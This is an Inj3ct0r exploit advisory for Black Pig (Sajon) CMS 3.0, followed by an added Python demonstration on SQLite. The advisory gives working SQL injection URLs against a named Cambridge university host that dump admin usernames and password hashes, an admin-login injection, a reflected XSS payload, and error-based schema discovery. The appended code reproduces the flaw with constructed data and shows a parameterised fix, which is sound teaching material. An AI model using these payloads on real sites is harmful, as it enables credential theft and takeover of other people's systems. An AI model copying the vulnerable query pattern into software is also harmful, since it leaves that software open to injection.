=============================================
Black Pig (Sajon) CMS 3.0 SQL Injection + XSS
=============================================

Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Product : Black Pig (Sajon) CMS 3.0
Site    : http://www.blackpig.co.uk/

Found on a University of Cambridge site. =]
The script name may differ between installations, but the vulnerable parameter is "key".

1) SQL injection

The "key" parameter of archive.php is placed into the database query unsanitised. A non-existent (negative) id followed by a UNION SELECT with the same column count (three) replaces the archive row with rows from the cms_users table.

Example:
http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+username,2,password+from+cms_users--
http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+version(),2,concat_ws(char(58),group_concat(username+separator+0x3a),group_concat(password+separator+0x3a))+from+cms_users--

The second request dumps every username:password pair in one row; version(), concat_ws() and group_concat(... separator ...) are MySQL syntax, so the backend is MySQL.

SQL injection in the admin login (authentication form):

Example:
POST formloginuser=%00

2) XSS

http://www.site.com/cms/admin.php

POST action=login&gomodule=>">alert(KU-KU,7750312847)%3B

The value of gomodule is reflected into the login page unescaped; the same applies to the goid and gopage parameters.

The admin interface is at: site.com/cms/

How the table and field names were found:
http://www.site.com/cms/admin.php - enter ' in the login box (the resulting database error exposes the query).
Table: cms_users
Fields: username, password

ThE End =]

Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~ - [ [ : Inj3ct0r : ] ]
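Worked example, added here and not part of the Inj3ct0r advisory or the Black Pig CMS source: it reproduces the two SQL injection behaviours above on an in-memory SQLite database and shows the parameterised fix for the archive.php "key" lookup. Only the cms_users table and its username/password columns come from the advisory; the archive table layout, the user rows and the password hashes are constructed sample data, and SQLite stands in for MySQL (so the second, MySQL-specific PoC with version()/concat_ws/group_concat is not reproduced).

```python
"""Added example, not code from the Inj3ct0r advisory or from Black Pig CMS.

Shows, on SQLite:
  1. archive.php?key=-24+union+select+username,2,password+from+cms_users--
     returning cms_users rows instead of an archive entry;
  2. a lone ' in the admin login box making the database error out;
  3. the parameterised, type-checked replacement for the archive lookup.
Assumptions: archive(id,title,body), the user rows and the md5 hashes are
constructed here; the advisory only names cms_users/username/password.
"""
import sqlite3
from urllib.parse import unquote_plus

# First PoC payload from the advisory, exactly as it appears in the key= value.
ADVISORY_PAYLOAD = "-24+union+select+username,2,password+from+cms_users--"


def decode_key(raw_query_value):
    """URL-decode a key= value the way PHP's $_GET does ('+' becomes a space)."""
    return unquote_plus(raw_query_value)


def make_db():
    """Constructed sample schema: archive(id,title,body) and cms_users(username,password)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE archive   (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE cms_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO archive   VALUES (24, 'Newsletter 24', 'constructed sample article');
        -- constructed accounts; the hashes are md5('password') and md5('abc123')
        INSERT INTO cms_users VALUES (1, 'admin',  '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO cms_users VALUES (2, 'editor', 'e99a18c4428cb38d5f260853678922e3');
    """)
    return db


def archive_vulnerable(db, key):
    """Mirrors the flaw: key is concatenated into the SQL text, so a negative id
    followed by UNION SELECT replaces the archive row with attacker-chosen rows.
    The injected SELECT must match the original column count (3); the '2' is
    a filler for the middle column and '--' comments out whatever follows."""
    sql = "SELECT id, title, body FROM archive WHERE id=" + key
    return db.execute(sql).fetchall()


def archive_fixed(db, key):
    """Hardened version: enforce the integer type the page expects, then bind
    the value so the database never parses it as SQL."""
    try:
        key_int = int(key)
    except ValueError:
        return []          # '-24 union select ...' is not an int: rejected outright
    return db.execute(
        "SELECT id, title, body FROM archive WHERE id=?", (key_int,)
    ).fetchall()


def login_vulnerable(db, username):
    """Mirrors the admin login query. Returns (rows, error_text). A single quote
    unbalances the string literal; a page that echoes the database error then
    leaks the query text, which is how table and column names get disclosed."""
    sql = "SELECT id FROM cms_users WHERE username='" + username + "'"
    try:
        return db.execute(sql).fetchall(), None
    except sqlite3.OperationalError as exc:
        return [], str(exc)


if __name__ == "__main__":
    db = make_db()
    key = decode_key(ADVISORY_PAYLOAD)
    print("vulnerable:", archive_vulnerable(db, key))   # cms_users rows come back
    print("fixed     :", archive_fixed(db, key))        # []
    print("login ' ->", login_vulnerable(db, "'"))       # ([], <database error text>)
```

The fix is two-part on purpose: `int()` rejects the payload before it reaches the database, and the `?` placeholder protects the lookup even if a future caller passes a string, which is what a `key` that is sometimes a slug would need.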